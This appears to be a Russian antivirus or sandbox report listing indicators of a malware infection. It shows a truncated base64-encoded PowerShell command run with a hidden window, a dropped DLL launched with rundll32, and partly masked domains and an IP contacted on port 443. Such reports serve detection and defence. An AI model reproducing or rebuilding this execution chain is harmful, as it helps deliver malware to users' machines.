Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABTAFcANwB6AGgAIAAgAD0AWwB0AFkAUABFAF0AKAAiAHsAMQB9AHsANQB9AHsAMwB9AHsAMAB9AHsAMgB9AHsANAB9ACIAIAAtAEYAJwAuAGkATwAuAGQASQBSAGUAYwB0ACcALAAnAFMAJwAsACcAbwByACcALAAnAFQARQ...
- %HOMEPATH%\xw7agnk\wwo1dxy\cmsi71.dll
- 'lo###oods.com':443
- 'up##.com.ua':443
- '19#.#50.118.7':443
- DNS ASK lo###oods.com
- DNS ASK up##.com.ua
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABTAFcANwB6AGgAIAAgAD0AWwB0AFkAUABFAF0AKAAiAHsAMQB9AHsANQB9AHsAMwB9AHsAMAB9AHsAMgB9AHsANAB9ACIAIAAtAEYAJwAuAGkATwAuAGQASQBSAGUAYwB0ACcALAAnAFMAJwAsACcAbwByACcALAAnAFQARQ...' (со скрытым окном)
- '<SYSTEM32>\rundll32.exe' %HOMEPATH%\Xw7agnk\Wwo1dxy\Cmsi71.dll 0